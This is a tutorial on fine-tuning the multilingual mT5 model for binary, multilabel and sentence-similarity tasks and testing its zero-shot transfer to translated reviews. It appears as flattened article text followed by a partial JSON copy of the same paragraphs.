0 0 1 1 2 0 3 0 4 1 prefix input_text \ 0 binary classification Contrary to other reviews, I have zero complai... 1 binary classification Last summer I had an appointment to get new ti... 2 binary classification Friendly staff, same starbucks fair you get an... 3 binary classification The food is good. Unfortunately the service is... 4 binary classification Even when we didn't have a car Filene's Baseme... target_text 0 1 1 0 2 1 3 0 4 1 prefix = "data/multilabel_classification/" multi_train_df = pd.read_csv(prefix + 'train.csv') multi_train_df["comment_text"].str.replace('\n', ' ').str.replace('\t', ' ') for col in multi_train_df.columns: if col not in ["id", "comment_text"]: multi_train_df[col] = multi_train_df[col].apply(lambda x: col if x else "") multi_train_df["target_text"] = multi_train_df['toxic'].str.cat(multi_train_df[[col for col in multi_train_df.columns if col not in ["id", "comment_text", "toxic"]]], sep=',') multi_train_df["target_text"] = multi_train_df["target_text"].apply(lambda x: ",".join(word for word in x.split(",") if word)).apply(lambda x: x if x else "clean") multi_train_df["input_text"] = multi_train_df["comment_text"].str.replace('\n', ' ') multi_train_df["prefix"] = "multilabel classification" multi_train_df = multi_train_df[["prefix", "input_text", "target_text"]] multi_train_df, multi_eval_df = train_test_split(multi_train_df, test_size=0.1) multi_train_df.head() prefix = 'data/regression/' sts_train_df = pd.read_csv(prefix + 'train.tsv', sep='\t', error_bad_lines=False).dropna() sts_eval_df = pd.read_csv(prefix + 'dev.tsv', sep='\t', error_bad_lines=False).dropna() sts_train_df["sentence1"] = sts_train_df["sentence1"].str.replace('\n', ' ').str.replace('\t', ' ') sts_train_df["sentence2"] = sts_train_df["sentence2"].str.replace('\n', ' ').str.replace('\t', ' ') sts_eval_df["sentence1"] = sts_eval_df["sentence1"].str.replace('\n', ' ').str.replace('\t', ' ') sts_eval_df["sentence2"] = sts_eval_df["sentence2"].str.replace('\n', ' ').str.replace('\t', ' ') b'Skipping line 2509: expected 10 fields, saw 11\nSkipping line 2650: expected 10 fields, saw 11\nSkipping line 2727: expected 10 fields, saw 11\nSkipping line 3071: expected 10 fields, saw 11\nSkipping line 3393: expected 10 fields, saw 11\n' b'Skipping line 1042: expected 10 fields, saw 11\nSkipping line 1066: expected 10 fields, saw 11\nSkipping line 1083: expected 10 fields, saw 11\nSkipping line 1137: expected 10 fields, saw 11\nSkipping line 1150: expected 10 fields, saw 11\n' sts_train_df.drop(2001, inplace=True) # This line is badly formatted. Getting rid. sts_train_df["input_text"] = sts_train_df.apply(lambda x: "sentence1: " + x["sentence1"] + " sentence2: " + x["sentence2"], axis=1) sts_eval_df["input_text"] = sts_eval_df.apply(lambda x: "sentence1: " + x["sentence1"] + " sentence2: " + x["sentence2"], axis=1) sts_train_df["target_text"] = sts_train_df["score"].apply(lambda x: round(x * 5) / 5).astype(str) sts_eval_df["target_text"] = sts_eval_df["score"].apply(lambda x: round(x * 5) / 5).astype(str) sts_train_df["prefix"] = "similarity" sts_eval_df["prefix"] = "similarity" sts_train_df = sts_train_df[["prefix", "input_text", "target_text"]] sts_eval_df = sts_eval_df[["prefix", "input_text", "target_text"]] train_df = pd.concat([binary_train_df, multi_train_df, sts_train_df]).astype(str) eval_df = pd.concat([binary_eval_df, multi_eval_df, sts_eval_df]).astype(str) train_df.to_csv("data/train.tsv", "\t") eval_df.to_csv("data/eval.tsv", "\t") The notebook above loads each of the datasets; preprocesses them for mT5 and finally combines them into a unified dataframe. This gives us a dataframe with 3 unique prefixes, namely binary classification, multilabel classification, and similarity. Note that the prefixes themselves are fairly arbitrary, the important thing is to ensure that each task has its own unique prefix. The input to the model will take the following format: <prefix>: <input_text> The ": " is automatically added when training. A few other things to note: The output of the multilabel classification task is a comma-separated list of the predicted labels (toxic, severe_toxic, obscene, threat, insult, identity_hate). If no label is predicted, the output should be clean. The input_text for the similarity task includes both sentences as shown in the following example;sentence1: A man plays the guitar. sentence2: The man sang and played his guitar. The output of the similarity task is a number (as a string) between 0.0 and 5.0, going by increments of 0.2. (E.g. 0.0, 0.4, 3.0, 5.0). Running the notebook should give you two files, train.tsv and eval.tsv, which we will use to train and test our model! We will be using the Simple Transformers library (based on the Hugging Face Transformers) to train the mT5 model. The instructions given below will install all the requirements. Install Anaconda or Miniconda Package Manager from here.Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorchInstall simpletransformers.pip install simpletransformers Install Anaconda or Miniconda Package Manager from here. Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorch Install simpletransformers.pip install simpletransformers See installation docs Training a model is quite easy with Simple Transformers. First, we start by importing the necessary libraries and setting up logging. Next, we load the datasets that we generated earlier. Note that we are casting all the data in the Dataframe as strings. This is because mT5 is a sequence-to-sequence model which expects all inputs and outputs to be text sequences. If we have numeric values (or any other non-string values), we’ll run into errors during training. Next, we set up our pre-trained mT5 model. Here, we are configuring our mT5 model through model_args and instantiating a model with the pre-trained mt5-base weights. For more information about the different model_args and what they do, please refer to the Simple Transformers docs here and here. A model with this configuration can be trained on a GPU with 24 GB of VRAM. If your GPU has less VRAM than that and you run into CUDA memory issues, you can try using smaller train_batch_size and eval_batch_size values. You can also try using the google/mt5-small model which requires less memory (replace “google/mt5-base” with "google/mt5-small" in line 18 above). Now, we just have to train our model! The evaluation line is optional as we’ll be doing some real testing in the next section. You can comment it out to save some time. In our first test, we’ll follow the same evaluation procedure as in my original T5 experiment. Specifically, we’ll use the following metrics. Binary Classification: F1 score and Accuracy score Multilabel Classification: F1 score (Hugging Face SQuAD metrics implementation) and Exact matches (Hugging Face SQuAD metrics implementation) Similarity: Pearson correlation coefficient and Spearman correlation First, we will define the functions to calculate the metrics given above. Next, we read in the evaluation dataset and process it for testing. Here, to_predict: List of input sequences with the prefix and : prepended as expected by the mT5 model. truth: List of true labels tasks: List of tasks (binary classification, multilabel classification, or similarity) corresponding to each sequence in to_predict. Then, we load our trained mT5 model and generate predictions for each input sequence. As a sequence-to-sequence model, the decoding algorithm used and the hyperparameters (num_beams, do_sample, top_k, top_p) used to control it has a substantial impact on the quality of the predictions. If you’d like to learn more about the decoding process, please refer to the decoding algorithms section in this article and this excellent notebook by Huggingface. Now that we have our predictions (in df["predicted"]), it’s time to calculate the metrics. Running this snippet of code yields the results shown below. -----------------------------------Results: Scores for binary classification:F1 score: 0.8974482916528863Accuracy Score: 0.893921052631579Scores for multilabel classification:F1 score: 0.8971675648577516Exact matches: 0.8971675648577516Scores for similarity:Pearson Correlation: 0.012219660470091782Spearman Correlation: 0.00885628521396601 Note that there is a degree of randomness when using sampling decoding algorithms, so the scores will change when the test is repeated. However, the scores should be relatively close to these values. Before we dig into these scores, let’s put them side-by-side (and round them off for clarity) with the T5 scores for comparison. Binary Classification The mT5 model does a pretty good job at the binary classification task, although it does fall short of the scores set by the T5 model. Multilabel Classification Similar story here with the multilabel classification task with the mT5 models doing well but not as well as the T5 model. Typically, a monolingual model will outperform a comparable multilingual model, so, these results are as expected. Similarity Unlike the two previous tasks, the mT5 model fails miserably at sentence similarity. While it’s difficult to pinpoint the exact cause without more experimentation, the two reasons given below are likely to be largely responsible! One significant difference between T5 and mT5 is that the former undergoes supervised training as part of the pre-training process while the latter does not. That is, the pre-trained T5 model (before we fine-tune it) is already trained on multiple downstream tasks in addition to its primary unsupervised training objective.This means that the T5 model has the advantage of prior training on the similarity task (as well as other similar tasks). The similarity task is significantly underrepresented compared to the other two tasks. While this factor does affect the T5 model during fine-tuning, it appears that the supervised training during pre-training is able to compensate for it. Without the benefit of multi-task training during the pre-training process, this becomes a much harder challenge for the mT5 model. There might be other reasons (e.g. similarity being a sentence-pair task) and it’s likely that there are ways to get it to work for this task as well. Let me know if you find anything! However, mT5 was never designed to beat T5 in English language tasks! So, let’s move on to the true test, cross-lingual zero-shot transfer. In this test, we want to see if an mT5 model trained on an English task can perform the same task in other languages, without further training. For this test, we’ll focus on the first task, i.e. binary classification. We won’t be testing on the other tasks as the second task involves a lot of toxic language (I don’t expect the translation models to perform well here). The third task is, unfortunately, disqualified by default as it didn’t do well even in English. Before we can test the cross-lingual capabilities of mT5, we’ll first need to translate our evaluation data. For this, we’ll use the pre-trained MarianMT models originally trained by Jörg Tiedemann using the Marian C++ library. First, we’ll set up our translation models in translation_models.py Here, we are setting up functions to load four different translation models (english_to_romance_model will handle both French and Spanish). Next, we’ll do use these models to translate our evaluation dataset. Note that, the translations may take some time depending on available computational resources. If you want to speed things up, you can test with one language only. To keep the code clean, we’ll be doing this step in another file, translate_dataset.py. You can drop the languages you don’t want from the languages list in line 51. You can also comment out the unused translation models defined in model_map to prevent them from being downloaded and loaded into memory. Running the script above will generate the translated datasets and save them to the data directory. The code to calculate the metrics can be easily adapted from our original evaluation code. The only differences are that we need to loop over the eval.csv files for each language and we’ll only be evaluating the binary classification task. Let’s see how we did! Very impressive, considering the mT5 model was only fine-tuned on an English dataset! Based on these results, it seems like mT5 favours more common languages, although that is to be expected. However, it’s also possible that this difference is due to translation models for more common languages being relatively superior. Unfortunately, it doesn’t perform well for all the supported languages. For example, I tried a few examples in my native language, Sinhalese, with fairly poor (although not completely useless) results. If you want to try some quick predictions yourself, use the command simple-viewerin the terminal (in the directory which contains the outputs directory). Overall, I’m quite impressed with the performance of the mT5 model, particularly in the context of cross-lingual, zero-shot transfer learning. However, mT5 does seem to struggle with smaller datasets when compared to T5. Oversampling the similarity dataset to bring it in line with the others (or even training mT5 on this task alone) didn’t solve the issue, so it’s possible that the small size of the dataset isn’t the sole factor here. This calls for more investigation! The ability to train a model on English data and have it automatically transfer that knowledge to a bunch of other languages can be incredibly useful, especially when you consider that most training datasets are only available in English. With such versatility, I’m sure that people will come up with a ton of creative applications! mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdfExploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.htmlHuggingface Transformers — https://huggingface.co/transformers/ mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdf Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683 Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.html Huggingface Transformers — https://huggingface.co/transformers/
[ { "code": null, "e": 794, "s": 172, "text": "The original T5 (Text-To-Text Transfer Transformer) model achieved state-of-the-art performance on a variety of NLP benchmarks by leveraging a unified text-to-text format and a gigantic training dataset (C4). With the unified text-to-text approach, all downstream tasks were reframed such that both the input and the output of the model are text sequences. At a whopping 750 GB, the C4 (Colossal Clean Crawled Corpus) dataset was orders of magnitude larger than most existing datasets. Released back in October 2019 by Google, T5 still sits pretty at the top of the SuperGLUE benchmark as a testament to its capabilities." }, { "code": null, "e": 904, "s": 794, "text": "More information regarding the original T5 implementation and how to use it can be found in my article below." }, { "code": null, "e": 927, "s": 904, "text": "towardsdatascience.com" }, { "code": null, "e": 1148, "s": 927, "text": "As impressive as T5 was (and still is), it was trained entirely on English text and therefore, can only be used for English-language tasks. Sadly, this leaves out some 80% of the world population who don’t speak English." }, { "code": null, "e": 1493, "s": 1148, "text": "The mT5 model is a multilingual variant of the original T5 model, aimed at remedying this problem. mT5 closely follows the architecture and the training procedure of T5 but is trained on mC4 (~26 Terabytes!), a multilingual variant of the C4 dataset. It retains all the advantages of T5, but it also supports a total of 101 different languages!" }, { "code": null, "e": 1759, "s": 1493, "text": "MT5 reframes any NLP task as a text-to-text task, which means that both the input and the output are text sequences. Just like with T5, the task to be performed can be specified by adding a prefix (a small text sequence) to the start of the sequence as shown below." }, { "code": null, "e": 1858, "s": 1759, "text": "However, unlike T5, the mT5 model can also be trained on datasets in languages other than English." }, { "code": null, "e": 2228, "s": 1858, "text": "Even more impressively, mT5 is also capable of cross-lingual, zero-shot transfer learning, i.e., the model is trained on an English dataset for a specific task, but it also learns to perform that task in other languages. This is quite useful when a certain dataset is only available in English, but you need it to work in another language (or multiple other languages)!" }, { "code": null, "e": 2455, "s": 2228, "text": "In this article, we will focus on the zero-shot transfer learning ability of mT5. We’ll also do a quick comparison of its performance against T5 on English data. We’ll be doing all of this with the Simple Transformers library." }, { "code": null, "e": 2526, "s": 2455, "text": "In a previous article, I have trained a T5 model on the 3 tasks below:" }, { "code": null, "e": 2683, "s": 2526, "text": "Binary classification — Yelp Reviews DatasetMultilabel classification — Toxic Comments datasetSentence similarity (sentence pair regression) — STS-B dataset" }, { "code": null, "e": 2728, "s": 2683, "text": "Binary classification — Yelp Reviews Dataset" }, { "code": null, "e": 2779, "s": 2728, "text": "Multilabel classification — Toxic Comments dataset" }, { "code": null, "e": 2842, "s": 2779, "text": "Sentence similarity (sentence pair regression) — STS-B dataset" }, { "code": null, "e": 2865, "s": 2842, "text": "towardsdatascience.com" }, { "code": null, "e": 2993, "s": 2865, "text": "We’ll be using the same tasks and datasets to train our mT5 model so that we can easily make the comparison between mT5 and T5." }, { "code": null, "e": 3210, "s": 2993, "text": "To test the zero-shot transfer learning, we’ll focus on the first task. We’ll translate each testing example of the Yelp dataset to five different languages and see how well the model performs on the translated data." }, { "code": null, "e": 3237, "s": 3210, "text": "The five languages will be" }, { "code": null, "e": 3269, "s": 3237, "text": "DutchGermanFrenchSwedishSpanish" }, { "code": null, "e": 3275, "s": 3269, "text": "Dutch" }, { "code": null, "e": 3282, "s": 3275, "text": "German" }, { "code": null, "e": 3289, "s": 3282, "text": "French" }, { "code": null, "e": 3297, "s": 3289, "text": "Swedish" }, { "code": null, "e": 3305, "s": 3297, "text": "Spanish" }, { "code": null, "e": 3413, "s": 3305, "text": "We’ll be using MarianMT models to translate the text, which are also available through Simple Transformers!" }, { "code": null, "e": 3541, "s": 3413, "text": "Note: You can find all the code in this article in the examples/t5/mt5 directory (link) of the Simple Transformers Github repo." }, { "code": null, "e": 3662, "s": 3541, "text": "Since we are going to be working with 3 datasets, we’ll put them in 3 separate subdirectories inside the data directory." }, { "code": null, "e": 3689, "s": 3662, "text": "data/binary_classification" }, { "code": null, "e": 3720, "s": 3689, "text": "data/multilabel_classification" }, { "code": null, "e": 3736, "s": 3720, "text": "data/regression" }, { "code": null, "e": 3992, "s": 3736, "text": "Download the Yelp Reviews Dataset.Extract train.csv and test.csv to data/binary_classification.Download the Toxic Comments dataset.Extract the csv files to data/multilabel_classification.Download the STS-B dataset.Extract the csv files to data/regression." }, { "code": null, "e": 4027, "s": 3992, "text": "Download the Yelp Reviews Dataset." }, { "code": null, "e": 4089, "s": 4027, "text": "Extract train.csv and test.csv to data/binary_classification." }, { "code": null, "e": 4126, "s": 4089, "text": "Download the Toxic Comments dataset." }, { "code": null, "e": 4183, "s": 4126, "text": "Extract the csv files to data/multilabel_classification." }, { "code": null, "e": 4211, "s": 4183, "text": "Download the STS-B dataset." }, { "code": null, "e": 4253, "s": 4211, "text": "Extract the csv files to data/regression." }, { "code": null, "e": 4520, "s": 4253, "text": "The task to be performed by an mT5 model is specified by the prefix prepended to the input. Because of this, the input data format for an mT5 model (or a T5 model) in Simple Transformers is a Pandas dataframe with the 3 columns — prefix, input_text, and target_text." }, { "code": null, "e": 4700, "s": 4520, "text": "This makes it easy to combine all 3 of our datasets into a single dataframe, as we can simply assign a prefix value to each task and use that to differentiate between the 3 tasks." }, { "code": null, "e": 4749, "s": 4700, "text": "In this case, the three prefixes are as follows:" }, { "code": null, "e": 4806, "s": 4749, "text": "binary classificationmultilabel classificationsimilarity" }, { "code": null, "e": 4828, "s": 4806, "text": "binary classification" }, { "code": null, "e": 4854, "s": 4828, "text": "multilabel classification" }, { "code": null, "e": 4865, "s": 4854, "text": "similarity" }, { "code": null, "e": 4951, "s": 4865, "text": "import pandas as pd\nimport json\nfrom sklearn.model_selection import train_test_split\n" }, { "code": null, "e": 5795, "s": 4951, "text": "prefix = 'data/binary_classification/'\n\nbinary_train_df = pd.read_csv(prefix + 'train.csv', header=None)\nbinary_train_df.head()\n\nbinary_eval_df = pd.read_csv(prefix + 'test.csv', header=None)\nbinary_eval_df.head()\n\nbinary_train_df[0] = (binary_train_df[0] == 2).astype(int)\nbinary_eval_df[0] = (binary_eval_df[0] == 2).astype(int)\n\nbinary_train_df = pd.DataFrame({\n 'prefix': [\"binary classification\" for i in range(len(binary_train_df))],\n 'input_text': binary_train_df[1].str.replace('\\n', ' '),\n 'target_text': binary_train_df[0].astype(str),\n})\n\nprint(binary_train_df.head())\n\nbinary_eval_df = pd.DataFrame({\n 'prefix': [\"binary classification\" for i in range(len(binary_eval_df))],\n 'input_text': binary_eval_df[1].str.replace('\\n', ' '),\n 'target_text': binary_eval_df[0].astype(str),\n})\n\n\nprint(binary_eval_df.head())\n" }, { "code": null, "e": 6920, "s": 5795, "text": "prefix input_text \\\n0 binary classification Unfortunately, the frustration of being Dr. Go... \n1 binary classification Been going to Dr. Goldberg for over 10 years. ... \n2 binary classification I don't know what Dr. Goldberg was like before... \n3 binary classification I'm writing this review to give you a heads up... \n4 binary classification All the food is great here. But the best thing... \n\n target_text \n0 0 \n1 1 \n2 0 \n3 0 \n4 1 \n prefix input_text \\\n0 binary classification Contrary to other reviews, I have zero complai... \n1 binary classification Last summer I had an appointment to get new ti... \n2 binary classification Friendly staff, same starbucks fair you get an... \n3 binary classification The food is good. Unfortunately the service is... \n4 binary classification Even when we didn't have a car Filene's Baseme... \n\n target_text \n0 1 \n1 0 \n2 1 \n3 0 \n4 1 \n" }, { "code": null, "e": 7913, "s": 6920, "text": "prefix = \"data/multilabel_classification/\"\n\nmulti_train_df = pd.read_csv(prefix + 'train.csv')\nmulti_train_df[\"comment_text\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\n\nfor col in multi_train_df.columns:\n if col not in [\"id\", \"comment_text\"]:\n multi_train_df[col] = multi_train_df[col].apply(lambda x: col if x else \"\")\n\nmulti_train_df[\"target_text\"] = multi_train_df['toxic'].str.cat(multi_train_df[[col for col in multi_train_df.columns if col not in [\"id\", \"comment_text\", \"toxic\"]]], sep=',')\nmulti_train_df[\"target_text\"] = multi_train_df[\"target_text\"].apply(lambda x: \",\".join(word for word in x.split(\",\") if word)).apply(lambda x: x if x else \"clean\")\nmulti_train_df[\"input_text\"] = multi_train_df[\"comment_text\"].str.replace('\\n', ' ')\nmulti_train_df[\"prefix\"] = \"multilabel classification\"\nmulti_train_df = multi_train_df[[\"prefix\", \"input_text\", \"target_text\"]]\n\nmulti_train_df, multi_eval_df = train_test_split(multi_train_df, test_size=0.1)\n\nmulti_train_df.head()\n" }, { "code": null, "e": 8519, "s": 7913, "text": "prefix = 'data/regression/'\n\nsts_train_df = pd.read_csv(prefix + 'train.tsv', sep='\\t', error_bad_lines=False).dropna()\nsts_eval_df = pd.read_csv(prefix + 'dev.tsv', sep='\\t', error_bad_lines=False).dropna()\n\nsts_train_df[\"sentence1\"] = sts_train_df[\"sentence1\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_train_df[\"sentence2\"] = sts_train_df[\"sentence2\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_eval_df[\"sentence1\"] = sts_eval_df[\"sentence1\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\nsts_eval_df[\"sentence2\"] = sts_eval_df[\"sentence2\"].str.replace('\\n', ' ').str.replace('\\t', ' ')\n" }, { "code": null, "e": 9008, "s": 8519, "text": "b'Skipping line 2509: expected 10 fields, saw 11\\nSkipping line 2650: expected 10 fields, saw 11\\nSkipping line 2727: expected 10 fields, saw 11\\nSkipping line 3071: expected 10 fields, saw 11\\nSkipping line 3393: expected 10 fields, saw 11\\n'\nb'Skipping line 1042: expected 10 fields, saw 11\\nSkipping line 1066: expected 10 fields, saw 11\\nSkipping line 1083: expected 10 fields, saw 11\\nSkipping line 1137: expected 10 fields, saw 11\\nSkipping line 1150: expected 10 fields, saw 11\\n'\n" }, { "code": null, "e": 9092, "s": 9008, "text": "sts_train_df.drop(2001, inplace=True) # This line is badly formatted. Getting rid.\n" }, { "code": null, "e": 9763, "s": 9092, "text": "sts_train_df[\"input_text\"] = sts_train_df.apply(lambda x: \"sentence1: \" + x[\"sentence1\"] + \" sentence2: \" + x[\"sentence2\"], axis=1)\nsts_eval_df[\"input_text\"] = sts_eval_df.apply(lambda x: \"sentence1: \" + x[\"sentence1\"] + \" sentence2: \" + x[\"sentence2\"], axis=1)\n\nsts_train_df[\"target_text\"] = sts_train_df[\"score\"].apply(lambda x: round(x * 5) / 5).astype(str)\nsts_eval_df[\"target_text\"] = sts_eval_df[\"score\"].apply(lambda x: round(x * 5) / 5).astype(str)\n\nsts_train_df[\"prefix\"] = \"similarity\"\nsts_eval_df[\"prefix\"] = \"similarity\"\n\nsts_train_df = sts_train_df[[\"prefix\", \"input_text\", \"target_text\"]]\nsts_eval_df = sts_eval_df[[\"prefix\", \"input_text\", \"target_text\"]]\n" }, { "code": null, "e": 9924, "s": 9763, "text": "train_df = pd.concat([binary_train_df, multi_train_df, sts_train_df]).astype(str)\neval_df = pd.concat([binary_eval_df, multi_eval_df, sts_eval_df]).astype(str)\n" }, { "code": null, "e": 10003, "s": 9924, "text": "train_df.to_csv(\"data/train.tsv\", \"\\t\")\neval_df.to_csv(\"data/eval.tsv\", \"\\t\")\n" }, { "code": null, "e": 10131, "s": 10006, "text": "The notebook above loads each of the datasets; preprocesses them for mT5 and finally combines them into a unified dataframe." }, { "code": null, "e": 10440, "s": 10131, "text": "This gives us a dataframe with 3 unique prefixes, namely binary classification, multilabel classification, and similarity. Note that the prefixes themselves are fairly arbitrary, the important thing is to ensure that each task has its own unique prefix. The input to the model will take the following format:" }, { "code": null, "e": 10463, "s": 10440, "text": "<prefix>: <input_text>" }, { "code": null, "e": 10510, "s": 10463, "text": "The \": \" is automatically added when training." }, { "code": null, "e": 10538, "s": 10510, "text": "A few other things to note:" }, { "code": null, "e": 10754, "s": 10538, "text": "The output of the multilabel classification task is a comma-separated list of the predicted labels (toxic, severe_toxic, obscene, threat, insult, identity_hate). If no label is predicted, the output should be clean." }, { "code": null, "e": 10933, "s": 10754, "text": "The input_text for the similarity task includes both sentences as shown in the following example;sentence1: A man plays the guitar. sentence2: The man sang and played his guitar." }, { "code": null, "e": 11069, "s": 10933, "text": "The output of the similarity task is a number (as a string) between 0.0 and 5.0, going by increments of 0.2. (E.g. 0.0, 0.4, 3.0, 5.0)." }, { "code": null, "e": 11188, "s": 11069, "text": "Running the notebook should give you two files, train.tsv and eval.tsv, which we will use to train and test our model!" }, { "code": null, "e": 11302, "s": 11188, "text": "We will be using the Simple Transformers library (based on the Hugging Face Transformers) to train the mT5 model." }, { "code": null, "e": 11366, "s": 11302, "text": "The instructions given below will install all the requirements." }, { "code": null, "e": 11662, "s": 11366, "text": "Install Anaconda or Miniconda Package Manager from here.Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorchInstall simpletransformers.pip install simpletransformers" }, { "code": null, "e": 11719, "s": 11662, "text": "Install Anaconda or Miniconda Package Manager from here." }, { "code": null, "e": 11902, "s": 11719, "text": "Create a new virtual environment and install packages.conda create -n simpletransformers pythonconda activate simpletransformersconda install pytorch>=1.6 cudatoolkit=10.2 -c pytorch" }, { "code": null, "e": 11960, "s": 11902, "text": "Install simpletransformers.pip install simpletransformers" }, { "code": null, "e": 11982, "s": 11960, "text": "See installation docs" }, { "code": null, "e": 12116, "s": 11982, "text": "Training a model is quite easy with Simple Transformers. First, we start by importing the necessary libraries and setting up logging." }, { "code": null, "e": 12170, "s": 12116, "text": "Next, we load the datasets that we generated earlier." }, { "code": null, "e": 12447, "s": 12170, "text": "Note that we are casting all the data in the Dataframe as strings. This is because mT5 is a sequence-to-sequence model which expects all inputs and outputs to be text sequences. If we have numeric values (or any other non-string values), we’ll run into errors during training." }, { "code": null, "e": 12490, "s": 12447, "text": "Next, we set up our pre-trained mT5 model." }, { "code": null, "e": 12613, "s": 12490, "text": "Here, we are configuring our mT5 model through model_args and instantiating a model with the pre-trained mt5-base weights." }, { "code": null, "e": 12743, "s": 12613, "text": "For more information about the different model_args and what they do, please refer to the Simple Transformers docs here and here." }, { "code": null, "e": 13110, "s": 12743, "text": "A model with this configuration can be trained on a GPU with 24 GB of VRAM. If your GPU has less VRAM than that and you run into CUDA memory issues, you can try using smaller train_batch_size and eval_batch_size values. You can also try using the google/mt5-small model which requires less memory (replace “google/mt5-base” with \"google/mt5-small\" in line 18 above)." }, { "code": null, "e": 13148, "s": 13110, "text": "Now, we just have to train our model!" }, { "code": null, "e": 13279, "s": 13148, "text": "The evaluation line is optional as we’ll be doing some real testing in the next section. You can comment it out to save some time." }, { "code": null, "e": 13374, "s": 13279, "text": "In our first test, we’ll follow the same evaluation procedure as in my original T5 experiment." }, { "code": null, "e": 13421, "s": 13374, "text": "Specifically, we’ll use the following metrics." }, { "code": null, "e": 13472, "s": 13421, "text": "Binary Classification: F1 score and Accuracy score" }, { "code": null, "e": 13614, "s": 13472, "text": "Multilabel Classification: F1 score (Hugging Face SQuAD metrics implementation) and Exact matches (Hugging Face SQuAD metrics implementation)" }, { "code": null, "e": 13683, "s": 13614, "text": "Similarity: Pearson correlation coefficient and Spearman correlation" }, { "code": null, "e": 13757, "s": 13683, "text": "First, we will define the functions to calculate the metrics given above." }, { "code": null, "e": 13825, "s": 13757, "text": "Next, we read in the evaluation dataset and process it for testing." }, { "code": null, "e": 13831, "s": 13825, "text": "Here," }, { "code": null, "e": 13929, "s": 13831, "text": "to_predict: List of input sequences with the prefix and : prepended as expected by the mT5 model." }, { "code": null, "e": 13956, "s": 13929, "text": "truth: List of true labels" }, { "code": null, "e": 14089, "s": 13956, "text": "tasks: List of tasks (binary classification, multilabel classification, or similarity) corresponding to each sequence in to_predict." }, { "code": null, "e": 14175, "s": 14089, "text": "Then, we load our trained mT5 model and generate predictions for each input sequence." }, { "code": null, "e": 14376, "s": 14175, "text": "As a sequence-to-sequence model, the decoding algorithm used and the hyperparameters (num_beams, do_sample, top_k, top_p) used to control it has a substantial impact on the quality of the predictions." }, { "code": null, "e": 14540, "s": 14376, "text": "If you’d like to learn more about the decoding process, please refer to the decoding algorithms section in this article and this excellent notebook by Huggingface." }, { "code": null, "e": 14631, "s": 14540, "text": "Now that we have our predictions (in df[\"predicted\"]), it’s time to calculate the metrics." }, { "code": null, "e": 14692, "s": 14631, "text": "Running this snippet of code yields the results shown below." }, { "code": null, "e": 15033, "s": 14692, "text": "-----------------------------------Results: Scores for binary classification:F1 score: 0.8974482916528863Accuracy Score: 0.893921052631579Scores for multilabel classification:F1 score: 0.8971675648577516Exact matches: 0.8971675648577516Scores for similarity:Pearson Correlation: 0.012219660470091782Spearman Correlation: 0.00885628521396601" }, { "code": null, "e": 15233, "s": 15033, "text": "Note that there is a degree of randomness when using sampling decoding algorithms, so the scores will change when the test is repeated. However, the scores should be relatively close to these values." }, { "code": null, "e": 15362, "s": 15233, "text": "Before we dig into these scores, let’s put them side-by-side (and round them off for clarity) with the T5 scores for comparison." }, { "code": null, "e": 15384, "s": 15362, "text": "Binary Classification" }, { "code": null, "e": 15519, "s": 15384, "text": "The mT5 model does a pretty good job at the binary classification task, although it does fall short of the scores set by the T5 model." }, { "code": null, "e": 15545, "s": 15519, "text": "Multilabel Classification" }, { "code": null, "e": 15668, "s": 15545, "text": "Similar story here with the multilabel classification task with the mT5 models doing well but not as well as the T5 model." }, { "code": null, "e": 15783, "s": 15668, "text": "Typically, a monolingual model will outperform a comparable multilingual model, so, these results are as expected." }, { "code": null, "e": 15794, "s": 15783, "text": "Similarity" }, { "code": null, "e": 15879, "s": 15794, "text": "Unlike the two previous tasks, the mT5 model fails miserably at sentence similarity." }, { "code": null, "e": 16024, "s": 15879, "text": "While it’s difficult to pinpoint the exact cause without more experimentation, the two reasons given below are likely to be largely responsible!" }, { "code": null, "e": 16470, "s": 16024, "text": "One significant difference between T5 and mT5 is that the former undergoes supervised training as part of the pre-training process while the latter does not. That is, the pre-trained T5 model (before we fine-tune it) is already trained on multiple downstream tasks in addition to its primary unsupervised training objective.This means that the T5 model has the advantage of prior training on the similarity task (as well as other similar tasks)." }, { "code": null, "e": 16842, "s": 16470, "text": "The similarity task is significantly underrepresented compared to the other two tasks. While this factor does affect the T5 model during fine-tuning, it appears that the supervised training during pre-training is able to compensate for it. Without the benefit of multi-task training during the pre-training process, this becomes a much harder challenge for the mT5 model." }, { "code": null, "e": 17027, "s": 16842, "text": "There might be other reasons (e.g. similarity being a sentence-pair task) and it’s likely that there are ways to get it to work for this task as well. Let me know if you find anything!" }, { "code": null, "e": 17167, "s": 17027, "text": "However, mT5 was never designed to beat T5 in English language tasks! So, let’s move on to the true test, cross-lingual zero-shot transfer." }, { "code": null, "e": 17311, "s": 17167, "text": "In this test, we want to see if an mT5 model trained on an English task can perform the same task in other languages, without further training." }, { "code": null, "e": 17634, "s": 17311, "text": "For this test, we’ll focus on the first task, i.e. binary classification. We won’t be testing on the other tasks as the second task involves a lot of toxic language (I don’t expect the translation models to perform well here). The third task is, unfortunately, disqualified by default as it didn’t do well even in English." }, { "code": null, "e": 17863, "s": 17634, "text": "Before we can test the cross-lingual capabilities of mT5, we’ll first need to translate our evaluation data. For this, we’ll use the pre-trained MarianMT models originally trained by Jörg Tiedemann using the Marian C++ library." }, { "code": null, "e": 17931, "s": 17863, "text": "First, we’ll set up our translation models in translation_models.py" }, { "code": null, "e": 18071, "s": 17931, "text": "Here, we are setting up functions to load four different translation models (english_to_romance_model will handle both French and Spanish)." }, { "code": null, "e": 18304, "s": 18071, "text": "Next, we’ll do use these models to translate our evaluation dataset. Note that, the translations may take some time depending on available computational resources. If you want to speed things up, you can test with one language only." 